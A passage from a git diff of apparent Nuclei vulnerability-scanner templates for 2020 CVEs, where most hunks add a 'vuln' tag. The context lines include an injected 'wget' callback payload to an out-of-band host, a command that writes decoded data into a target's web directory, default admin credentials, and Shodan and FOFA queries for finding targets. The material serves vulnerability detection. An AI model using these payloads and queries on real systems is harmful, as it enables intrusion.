cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 2d3f86a4a4f..0a32e2fcada 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microsoft product: sql_server - tags: cve,cve2020,rce,packetstorm,microsoft,kev,vkev + tags: cve,cve2020,rce,packetstorm,microsoft,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 75276a0f365..44397ee971d 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: solarwinds product: orion_platform - tags: cve2020,cve,solarwinds,rce,auth-bypass,kev,vkev + tags: cve2020,cve,solarwinds,rce,auth-bypass,kev,vkev,vuln variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 7e1652cff83..3f21c11481f 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -33,7 +33,7 @@ info: - app="zoho-manageengine-desktop" shodan-query: http.title:"manageengine desktop central 10" google-query: intitle:"manageengine desktop central 10" - tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive,vkev + tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 5b10c0a5aec..c0ea45048b6 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -28,7 +28,7 @@ info: vendor: sonatype product: nexus fofa-query: title="nexus repository manager" - tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev,vkev + tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev,vkev,vuln variables: username: admin password: admin123 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 741bff48e34..859facc0720 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -34,7 +34,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,packetstorm,rconfig,sqli + tags: cve,cve2020,packetstorm,rconfig,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index b3f6ce46f36..a6754a069eb 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2020,cve,rconfig,sqli,vkev + tags: cve2020,cve,rconfig,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index c978da9f98d..78501f5d59f 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,sqli + tags: cve,cve2020,rconfig,sqli,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 3338d14d8ae..1ad8fc4f818 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,sqli,vkev + tags: cve,cve2020,rconfig,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 13660101f77..148daa33bf9 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,sqli + tags: cve,cve2020,rconfig,sqli,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index d973945fdc7..4faac83c5f9 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -36,7 +36,7 @@ info: - icon_hash=-1105083093 - body="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat,vkev + tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 9919e65151f..8c80b243f1f 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -33,7 +33,7 @@ info: - http.html:"Wavlink" - http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2020,exposure,wavlink + tags: cve,cve2020,exposure,wavlink,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-10987.yaml b/http/cves/2020/CVE-2020-10987.yaml index 76ca2917a79..2b58c72e592 100644 --- a/http/cves/2020/CVE-2020-10987.yaml +++ b/http/cves/2020/CVE-2020-10987.yaml @@ -21,7 +21,7 @@ info: max-request: 2 vendor: tenda product: ac15_firmware - tags: cve,cve2020,tenda,rce,kev,unauth,vkev + tags: cve,cve2020,tenda,rce,kev,unauth,vkev,vuln variables: payload: "wget http://{{interactsh-url}}" diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 0f859535ce5..8d1a10f8496 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -33,7 +33,7 @@ info: - icon_hash="-1474875778" - title="glpi" google-query: intitle:"glpi" - tags: cve,cve2020,redirect,glpi,glpi-project + tags: cve,cve2020,redirect,glpi,glpi-project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 29ab252ec1b..fecb10bbf4e 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -34,7 +34,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2020,cve,xss,grafana,hackerone + tags: cve2020,cve,xss,grafana,hackerone,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11441.yaml b/http/cves/2020/CVE-2020-11441.yaml index f38b82a2162..bfa99c6ef16 100644 --- a/http/cves/2020/CVE-2020-11441.yaml +++ b/http/cves/2020/CVE-2020-11441.yaml @@ -23,7 +23,7 @@ info: product: phpmyadmin shodan-query: title:"phpmyadmin" fofa-query: title="phpmyadmin" - tags: cve,crlf,phpmyadmin,cve2020 + tags: cve,crlf,phpmyadmin,cve2020,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 4aab63cd69e..9a56c8d3e32 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss + tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index b9117e50b58..377d0f3d29f 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: limesurvey product: limesurvey - tags: cve2020,cve,lfi,edb,packetstorm,limesurvey,vkev + tags: cve2020,cve,lfi,edb,packetstorm,limesurvey,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11514.yaml b/http/cves/2020/CVE-2020-11514.yaml index 3e3d48a3714..13435fcd7a3 100644 --- a/http/cves/2020/CVE-2020-11514.yaml +++ b/http/cves/2020/CVE-2020-11514.yaml @@ -25,7 +25,7 @@ info: product: seo framework: wordpress publicwww-query: "/wp-content/plugins/seo-by-rank-math/" - tags: cve,cve2020,wordpress,wordfence,seo-by-rank-math,wp-plugin,priv-esc,unauth,vkev + tags: cve,cve2020,wordpress,wordfence,seo-by-rank-math,wp-plugin,priv-esc,unauth,vkev,vuln variables: objecttype: "{{randstr}}" diff --git a/http/cves/2020/CVE-2020-11515.yaml b/http/cves/2020/CVE-2020-11515.yaml index 11b4b9d195e..1e468e2dee2 100644 --- a/http/cves/2020/CVE-2020-11515.yaml +++ b/http/cves/2020/CVE-2020-11515.yaml @@ -26,7 +26,7 @@ info: product: seo framework: wordpress publicwww-query: "/wp-content/plugins/seo-by-rank-math/" - tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp,vkev + tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 885d30aacd9..402f1885bbe 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: getgrav product: grav - tags: cve2020,cve,redirect,grav,getgrav + tags: cve2020,cve,redirect,grav,getgrav,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index dac6d79bf5b..88bfef41599 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -30,7 +30,7 @@ info: vendor: idangero product: chop_slider framework: wordpress - tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero,vkev + tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 59d019de241..3ba8d9c6e3b 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -32,7 +32,7 @@ info: - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" - tags: cve,cve2020,rce,superwebmailer,vkev + tags: cve,cve2020,rce,superwebmailer,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 3fa9113abe6..fe2d432fdb2 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -33,7 +33,7 @@ info: - http.title:"prtg" fofa-query: title="prtg" google-query: intitle:"prtg" - tags: cve2020,cve,prtg,disclosure,paessler + tags: cve2020,cve,prtg,disclosure,paessler,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index a3a0be5f31f..8b5bf2b9c01 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -28,7 +28,7 @@ info: product: docker-kong framework: kong shodan-query: cpe:"cpe:2.3:a:konghq:docker-kong" - tags: cve,cve2020,kong,konghq + tags: cve,cve2020,kong,konghq,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index d4a29621b99..3369d074190 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -32,7 +32,7 @@ info: product: duplicator framework: wordpress google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek,vkev + tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index dad7d42c7de..e8cec4e84de 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -33,7 +33,7 @@ info: - html:"Mitel" html:"MiCollab" - http.html:"mitel" html:"micollab" fofa-query: body="mitel" html:"micollab" - tags: cve,cve2020,packetstorm,mitel,micollab,lfi,vkev + tags: cve,cve2020,packetstorm,mitel,micollab,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index f4730d9a6e5..abaf36813ec 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microfocus product: operation_bridge_manager - tags: cve,cve2020,opm,rce,packetstorm,microfocus + tags: cve,cve2020,opm,rce,packetstorm,microfocus,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 82caa128751..8dbfe3a9ab5 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: microfocus product: application_performance_management - tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce,vkev + tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 0a67401d322..5f0843c8dec 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/gtranslate fofa-query: body=/wp-content/plugins/gtranslate publicwww-query: "/wp-content/plugins/gtranslate" - tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate + tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-11975.yaml b/http/cves/2020/CVE-2020-11975.yaml index 16f2e4d078a..0d5ae09647b 100644 --- a/http/cves/2020/CVE-2020-11975.yaml +++ b/http/cves/2020/CVE-2020-11975.yaml @@ -30,7 +30,7 @@ info: product: unomi shodan-query: http.title:"Apache Unomi" fofa-query: title="Apache Unomi" - tags: cve,cve2020,apache,unomi,rce,ognl,oast,vkev + tags: cve,cve2020,apache,unomi,rce,ognl,oast,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 34902ccb42c..21c1cda12f8 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve2020,cve,packetstorm,apache,airflow,rce,kev,vkev + tags: cve2020,cve,packetstorm,apache,airflow,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-11984.yaml b/http/cves/2020/CVE-2020-11984.yaml index 45e146a3065..8db7a90e820 100644 --- a/http/cves/2020/CVE-2020-11984.yaml +++ b/http/cves/2020/CVE-2020-11984.yaml @@ -24,7 +24,7 @@ info: vendor: apache product: http_server shodan-query: cpe:"cpe:2.3:a:apache:http_server" - tags: cve,cve2020,apache,httpd,rce,vkev + tags: cve,cve2020,apache,httpd,rce,vkev,vuln variables: oast: ".{{interactsh-url}}" diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 7589bfedcaa..74af21b406f 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -30,7 +30,7 @@ info: - http.html:"Apache Cocoon" - http.html:"apache cocoon" fofa-query: body="apache cocoon" - tags: cve,cve2020,apache,xml,cocoon,xxe,vkev + tags: cve,cve2020,apache,xml,cocoon,xxe,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 725acf63ec1..b7a01d77620 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -29,7 +29,7 @@ info: vendor: catchplugins product: catch_breadcrumb framework: wordpress - tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins + tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 344742b208e..c2bad11c578 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: cve,cve2020,zoho,lfi,manageengine,zohocorp + tags: cve,cve2020,zoho,lfi,manageengine,zohocorp,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 8994711f2d6..1a0a4619844 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -25,7 +25,7 @@ info: product: wn530h4_firmware shodan-query: http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2020,rce,wavlink,vkev + tags: cve,cve2020,rce,wavlink,vkev,vuln variables: str: "{{rand_base(3)}}" num: "{{rand_int(1, 10)}}" diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index a9e758ee90c..ba50b9c1d30 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -33,7 +33,7 @@ info: - http.html:"Wavlink" - http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2020,wavlink,exposure + tags: cve,cve2020,wavlink,exposure,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 56c0b9e9293..7b9008b061e 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -30,7 +30,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,authenticated,xss + tags: cve,cve2020,rconfig,authenticated,xss,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 10963294ea9..69e623b9785 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -30,7 +30,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2020,cve,rconfig,authenticated,xss + tags: cve2020,cve,rconfig,authenticated,xss,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-12262.yaml b/http/cves/2020/CVE-2020-12262.yaml index e332c64a0bd..4cdabfbbdb8 100644 --- a/http/cves/2020/CVE-2020-12262.yaml +++ b/http/cves/2020/CVE-2020-12262.yaml @@ -25,7 +25,7 @@ info: vendor: intelbras shodan-query: title:"Intelbras" fofa-query: title="Intelbras" - tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated + tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated,vuln variables: username: "admin" diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 72716890243..a7273374868 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: onkyo product: tx-nr585_firmware - tags: cve,cve2020,onkyo,lfi,traversal + tags: cve,cve2020,onkyo,lfi,traversal,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 831918a01de..9f6ec2b42e9 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -31,7 +31,7 @@ info: product: teampass shodan-query: http.html:"teampass" fofa-query: body="teampass" - tags: cve2020,cve,teampass,exposure,unauth + tags: cve2020,cve,teampass,exposure,unauth,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-12641.yaml b/http/cves/2020/CVE-2020-12641.yaml index 490bfb03ba3..67aa534c5cd 100644 --- a/http/cves/2020/CVE-2020-12641.yaml +++ b/http/cves/2020/CVE-2020-12641.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"roundcube" - cpe:"cpe:2.3:a:roundcube:webmail" - tags: cve,cve2020,roundcube,webmail,intrusive,kev,vkev + tags: cve,cve2020,roundcube,webmail,intrusive,kev,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 2419cae3d75..81dbb4fb57e 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -38,7 +38,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2020,cve,vbulletin,sqli,packetstorm,vkev + tags: cve2020,cve,vbulletin,sqli,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index 49df56fa057..1dc8e64ee18 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -28,7 +28,7 @@ info: vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz,vkev + tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 555696d9b5b..df0f579e0ea 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wn575a4 shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2020,wavlink,rce,oast,router,vkev + tags: cve,cve2020,wavlink,rce,oast,router,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 2f1ac7963bf..76f430cae10 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: rcos product: submitty - tags: cve,cve2020,redirect,submitty,oos,rcos + tags: cve,cve2020,redirect,submitty,oos,rcos,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index ee5e7cbd464..a3cd273a5ba 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -29,7 +29,7 @@ info: product: artica_proxy shodan-query: http.html:"artica" fofa-query: body="artica" - tags: cve,cve2020,artica,lfi,articatech,vkev + tags: cve,cve2020,artica,lfi,articatech,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index b4b66826871..c9a7a3bfa9f 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: netsweeper product: netsweeper - tags: cve2020,cve,netsweeper,rce,python,webadmin,vkev + tags: cve2020,cve,netsweeper,rce,python,webadmin,vkev,vuln variables: rand_str: "{{randstr}}" cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out' diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index d357b81b3b2..c6e7a9ca2e6 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: contentful product: python_example - tags: cve,cve2020,contentful,xss + tags: cve,cve2020,contentful,xss,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index b074c727f8e..4523fc1b0b2 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -36,7 +36,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2020,cve,grafana,ssrf,vkev + tags: cve2020,cve,grafana,ssrf,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 40204aefeef..aeb02b81f51 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2020,microweber,unauth,disclosure + tags: cve,cve2020,microweber,unauth,disclosure,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index f5ff4393cf0..c3bac3708d9 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -29,7 +29,7 @@ info: product: bitrix24 shodan-query: http.html:"/bitrix/" fofa-query: body="/bitrix/" - tags: cve2020,cve,xss,bitrix,bitrix24,vkev + tags: cve2020,cve,xss,bitrix,bitrix24,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 80681426009..2cbcab298b4 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -28,7 +28,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,auth-bypass,intrusive,vkev + tags: cve,cve2020,rconfig,auth-bypass,intrusive,vkev,vuln variables: username: "{{to_lower(rand_text_alpha(5))}}" password: "{{rand_text_alphanumeric(12)}}!" diff --git a/http/cves/2020/CVE-2020-13640.yaml b/http/cves/2020/CVE-2020-13640.yaml index 74e0abb113d..4c727d23899 100644 --- a/http/cves/2020/CVE-2020-13640.yaml +++ b/http/cves/2020/CVE-2020-13640.yaml @@ -23,7 +23,7 @@ info: vendor: gvectors product: wpdiscuz fofa-query: body="/wp-content/plugins/wpdiscuz" - tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev + tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev,vuln flow: | http(1) diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 831b37498fc..2b60d7290db 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -29,7 +29,7 @@ info: vendor: acf_to_rest_api_project product: acf_to_rest_api framework: wordpress - tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project + tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index e604ab248b5..fb4846a4357 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -34,7 +34,7 @@ info: - http.title:"extreme management center" fofa-query: title="extreme management center" google-query: intitle:"extreme management center" - tags: cve2020,cve,xss,extremenetworks + tags: cve2020,cve,xss,extremenetworks,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index e64580e7306..c87da539260 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -29,7 +29,7 @@ info: - http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" - tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms + tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13886.yaml b/http/cves/2020/CVE-2020-13886.yaml index e41fde9f61f..0dbe54af175 100644 --- a/http/cves/2020/CVE-2020-13886.yaml +++ b/http/cves/2020/CVE-2020-13886.yaml @@ -24,7 +24,7 @@ info: vendor: intelbras shodan-query: html:"/cgi-bin/cgiServer.exx" fofa-query: body="/cgi-bin/cgiServer.exx" - tags: cve,cve2020,intelbras,tip200,tip300,lfi + tags: cve,cve2020,intelbras,tip200,tip300,lfi,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 